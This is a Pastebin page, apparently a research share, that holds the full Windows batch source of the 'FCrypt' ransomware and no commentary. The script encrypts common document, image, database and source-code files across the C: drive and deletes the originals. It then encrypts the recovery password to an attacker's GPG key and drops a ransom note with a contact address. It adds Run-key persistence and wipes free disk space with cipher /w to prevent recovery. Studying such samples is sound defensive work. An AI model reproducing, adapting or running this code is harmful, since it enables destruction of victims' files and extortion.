Advertisement
bartblaze

FCrypt ransomware source

Feb 11th, 2019
301
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 3.30 KB | None | 0 0
  1. @shift
  2. @ECHO OFF
  3. ::Code By FIFCOM
  4. SetLocal EnableDelayedExpansion
  5. if not exist "%temp%\FCRYPT_VICTIM.TMP" (goto passgen
  6. ) else (goto END)
  7. :passgen
  8. cls
  9. if exist "%temp%\FCRYPT_PASSMD5.TMP" goto encrypt
  10. set wind=2&& set snow=1
  11. for %%1 in (0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do (set /a x+=1&& set x!x!=%%1)
  12. if "%wind%"=="2" (for /l %%1 in (1 1 %snow%)do (for /l %%2 in (1 1 10)do (set /a n%%2=!random! %% 62 +1
  13. call set 1%%1=!1%%1!%%x!n%%2!%%)
  14. set id=!1%%1!))
  15. set rand1=%random%
  16. set rand2=%random%
  17. set rand3=%random%
  18. set rand4=%random%
  19. set pass=%id%-%rand1%-%rand2%-%rand3%-%rand4%
  20. %MYFILES%\md5 -d%pass%>"%temp%\$"
  21. copy "%temp%\$" "%temp%\FCRYPT_PASSMD5.TMP"
  22. del "%temp%\$" >nul 2>nul
  23. goto encrypt
  24.  
  25. :encrypt
  26. cls
  27. set /p passmd5=<"%temp%\FCRYPT_PASSMD5.TMP"
  28. for /r "C:\" %%i in (*.xls *.doc *.xlsx *.docx *.pdf *.rtf *.cdr *.psd *.dwg *.cd *.mdb *.1cd *.dbf *.sqlite *.jpg *.jpeg *.zip *.bmp *.txt *.rar *.mp4 *.sql *.c *.cpp *.java *.php *.asp *.svg *.psd *.bak *.html) do (
  29. %MYFILES%\svchost.exe -e %passmd5% "%%i" "%%i.FCrypt" >nul 2>nul && del "%%i" >nul 2>nul
  30. )
  31. del /f /q "%temp%\FCRYPT_PASSMD5.TMP" >nul 2>nul
  32. wscript.exe "%MYFILES%\delsc.vbs"
  33. goto pkgen
  34.  
  35. :pkgen
  36. cls
  37. del %temp%\$
  38. echo.computername=%COMPUTERNAME%>"%temp%\FCRYPT_KEY.TMP"
  39. echo.username=%username%>>"%temp%\FCRYPT_KEY.TMP"
  40. echo.version=1.1>>"%temp%\FCRYPT_KEY.TMP"
  41. echo.decryptpass=%pass%>>"%temp%\FCRYPT_KEY.TMP"
  42. "%MYFILES%\gpg.exe" --import "%MYFILES%\FCRYPT_RSA_PUBLIC_KEY.TMP"
  43. "%MYFILES%\gpg.exe" -r FCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\FCRYPT_KEY.TMP"
  44. del "%temp%\FCRYPT_KEY.TMP" >nul 2>nul
  45. C:\Windows\System32\certutil -encode "%temp%\FCRYPT_KEY.TMP.gpg" "%temp%\FCRYPT.KEY"
  46. copy /b "%MYFILES%\FCrypt.txt.tmp"+"%temp%\FCRYPT.KEY" "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt"
  47. del /f /q "%temp%\trustdb.gpg"
  48. attrib -s -h -r "%AppData%\gnupg\*.*"
  49. attrib -s -h -r "%AppData%\gnupg"
  50. del /f /q "%AppData%\gnupg\*.*"
  51. rmdir /s /q "%AppData%\gnupg"
  52. copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt
  53. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT1" /t REG_SZ /f /d "notepad %temp%\#HELP-DECRYPT-FCRYPT1.1#.txt""
  54. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT2" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
  55. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT3" /t REG_SZ /f /d "copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
  56. del /f /q "%temp%\*.gpg"
  57. del /f /q "%temp%\*.*xe"
  58. echo Y|assoc .FCrypt=FCRYPT
  59. echo Y|ftype "FCRYPT"=mshta.exe vbscript:Execute^(^"msgbox ^"^" Sorry, this file has been encrypted.^"^"^&vbNewLine^&^"^" More information:^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" #HELP-DECRYPT-FCRYPT1.1#.txt^"^"^&vbNewLine^&vbNewLine^&^"^" [HELP:fcrypt@qq.com]^"^",16,^"^"FCrypt Ransomware v1.1^"^":close^"^)
  60. echo Y|assoc "FCRYPT"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
  61. echo %random%%random%%random%>%temp%\FCRYPT_VICTIM.TMP
  62. if exist "%systemroot%\system32\cipher.exe" (
  63. FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :cipherw %%s
  64. goto END
  65. :cipherw
  66. cipher /w:%1:
  67. goto:eof
  68. :END
  69. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement